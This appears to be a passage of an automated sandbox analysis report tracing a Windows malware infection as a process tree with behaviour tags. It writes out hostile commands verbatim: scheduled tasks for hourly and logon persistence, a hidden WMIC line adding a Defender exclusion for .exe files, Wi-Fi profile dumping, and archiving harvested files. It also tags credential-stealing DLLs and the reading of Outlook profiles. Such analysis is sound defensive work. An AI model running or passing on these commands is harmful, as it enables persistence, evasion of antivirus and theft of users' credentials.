C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4648 --field-trial-handle=1936,i,15719505982844195858,16556588884254049788,131072 /prefetch:84⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=1588 --field-trial-handle=1936,i,15719505982844195858,16556588884254049788,131072 /prefetch:14⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=5156 --field-trial-handle=1936,i,15719505982844195858,16556588884254049788,131072 /prefetch:14⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=2968 --field-trial-handle=1936,i,15719505982844195858,16556588884254049788,131072 /prefetch:14⤵
-
C:\Users\Admin\Documents\SimpleAdobe\Jhi7bB_jA5_c089U8_QQOtUu.exeC:\Users\Admin\Documents\SimpleAdobe\Jhi7bB_jA5_c089U8_QQOtUu.exe2⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Adds Run key to start application
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5220 -s 8603⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5220 -s 9723⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5220 -s 9723⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5220 -s 11083⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5220 -s 10123⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5220 -s 13923⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5220 -s 14763⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5220 -s 15123⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5220 -s 14763⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5220 -s 15123⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5220 -s 13963⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5220 -s 15443⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5220 -s 15323⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5220 -s 16203⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5220 -s 15683⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5220 -s 16483⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5220 -s 15123⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5220 -s 16763⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5220 -s 17203⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5220 -s 16843⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5220 -s 17083⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5220 -s 17123⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5220 -s 16763⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5220 -s 16443⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5220 -s 16683⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5220 -s 16963⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5220 -s 15003⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5220 -s 11163⤵
- Program crash
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV131_999e43077df71fdfc52bd5232a22cf9d\MSIUpdaterV131.exe" /tn "MSIUpdaterV131_999e43077df71fdfc52bd5232a22cf9d HR" /sc HOURLY /rl HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV131_999e43077df71fdfc52bd5232a22cf9d\MSIUpdaterV131.exe" /tn "MSIUpdaterV131_999e43077df71fdfc52bd5232a22cf9d LG" /sc ONLOGON /rl HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5220 -s 22083⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\heidixGtAjGxtrpPS\O6S1Wzz0aAdWMZAJXfpM.exe"C:\Users\Admin\AppData\Local\Temp\heidixGtAjGxtrpPS\O6S1Wzz0aAdWMZAJXfpM.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe"C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main5⤵
- Loads dropped DLL
-
C:\Windows\system32\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main6⤵
- Blocklisted process makes network request
- Loads dropped DLL
-
C:\Windows\system32\netsh.exenetsh wlan show profiles7⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\132431369515_Desktop.zip' -CompressionLevel Optimal7⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main5⤵
- Blocklisted process makes network request
- Loads dropped DLL
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV131_a5899eff6c87eb6c8acb1b5c9328dfae\MSIUpdaterV131.exe" /tn "MSIUpdaterV131_a5899eff6c87eb6c8acb1b5c9328dfae HR" /sc HOURLY /rl HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV131_a5899eff6c87eb6c8acb1b5c9328dfae\MSIUpdaterV131.exe" /tn "MSIUpdaterV131_a5899eff6c87eb6c8acb1b5c9328dfae LG" /sc ONLOGON /rl HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\heidixGtAjGxtrpPS\Tv7PsJs8FcwtKIXWOffv.exe"C:\Users\Admin\AppData\Local\Temp\heidixGtAjGxtrpPS\Tv7PsJs8FcwtKIXWOffv.exe"3⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/account4⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffd491946f8,0x7ffd49194708,0x7ffd491947185⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,6584704581848132266,11227296217009619853,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2092 /prefetch:25⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2076,6584704581848132266,11227296217009619853,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2144 /prefetch:35⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/video4⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffd491946f8,0x7ffd49194708,0x7ffd491947185⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2020,4147766005336901819,2362406623177418649,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2040 /prefetch:25⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2020,4147766005336901819,2362406623177418649,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2112 /prefetch:35⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2020,4147766005336901819,2362406623177418649,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2752 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,4147766005336901819,2362406623177418649,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3292 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,4147766005336901819,2362406623177418649,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3312 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,4147766005336901819,2362406623177418649,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3972 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,4147766005336901819,2362406623177418649,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4260 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,4147766005336901819,2362406623177418649,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4936 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,4147766005336901819,2362406623177418649,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5172 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2020,4147766005336901819,2362406623177418649,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5864 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2020,4147766005336901819,2362406623177418649,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5864 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,4147766005336901819,2362406623177418649,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3528 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,4147766005336901819,2362406623177418649,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3504 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,4147766005336901819,2362406623177418649,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5204 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,4147766005336901819,2362406623177418649,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5232 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/4⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffd491946f8,0x7ffd49194708,0x7ffd491947185⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1492,813455908877790971,3864237821506679607,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2104 /prefetch:35⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV131_72e6459d9280e67b92be0cfd9c31abc7\MSIUpdaterV131.exe" /tn "MSIUpdaterV131_72e6459d9280e67b92be0cfd9c31abc7 HR" /sc HOURLY /rl HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV131_72e6459d9280e67b92be0cfd9c31abc7\MSIUpdaterV131.exe" /tn "MSIUpdaterV131_72e6459d9280e67b92be0cfd9c31abc7 LG" /sc ONLOGON /rl HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\heidixGtAjGxtrpPS\1ce4T8CSFfhnBip5fIOd.exe"C:\Users\Admin\AppData\Local\Temp\heidixGtAjGxtrpPS\1ce4T8CSFfhnBip5fIOd.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Accesses Microsoft Outlook profiles
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
- outlook_office_path
- outlook_win_path
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5220 -s 22323⤵
- Program crash
-
C:\Users\Admin\Documents\SimpleAdobe\zs68HG1Ox5xeFmKezUewOUfR.exeC:\Users\Admin\Documents\SimpleAdobe\zs68HG1Ox5xeFmKezUewOUfR.exe2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exe" /tn "MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c HR" /sc HOURLY /rl HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exe" /tn "MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c LG" /sc ONLOGON /rl HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\spanxGtAjGxtrpPS\O6S1Wzz0aAdWMZAJXfpM.exe"C:\Users\Admin\AppData\Local\Temp\spanxGtAjGxtrpPS\O6S1Wzz0aAdWMZAJXfpM.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3968 -s 5605⤵
- Program crash
-
C:\Users\Admin\Documents\SimpleAdobe\TLDN91aTKSOJYLpBaJQwNZLS.exeC:\Users\Admin\Documents\SimpleAdobe\TLDN91aTKSOJYLpBaJQwNZLS.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\SimpleAdobe\wFbCIi7ajtTbWDtN33q5ZaVF.exeC:\Users\Admin\Documents\SimpleAdobe\wFbCIi7ajtTbWDtN33q5ZaVF.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\7zSA9DF.tmp\Install.exe.\Install.exe /ddidx "525403" /S3⤵
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True6⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True7⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bwrroZoeZRoQVpyAcj" /SC once /ST 11:41:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\AjftBdcqEhUoRKcxg\EmHZJQvMUXyMfbh\GfTHlTq.exe\" ZO /oosite_idxCi 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 5748 -ip 57481⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 2960 -ip 29601⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5220 -ip 52201⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 5220 -ip 52201⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 5220 -ip 52201⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 5220 -ip 52201⤵
-
C:\Windows\windefender.exeC:\Windows\windefender.exe1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 5220 -ip 52201⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 388 -p 5220 -ip 52201⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 5220 -ip 52201⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 5220 -ip 52201⤵
-
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 5220 -ip 52201⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5220 -ip 52201⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 5220 -ip 52201⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 5220 -ip 52201⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 5220 -ip 52201⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 5220 -ip 52201⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 5220 -ip 52201⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 5220 -ip 52201⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 5220 -ip 52201⤵
-
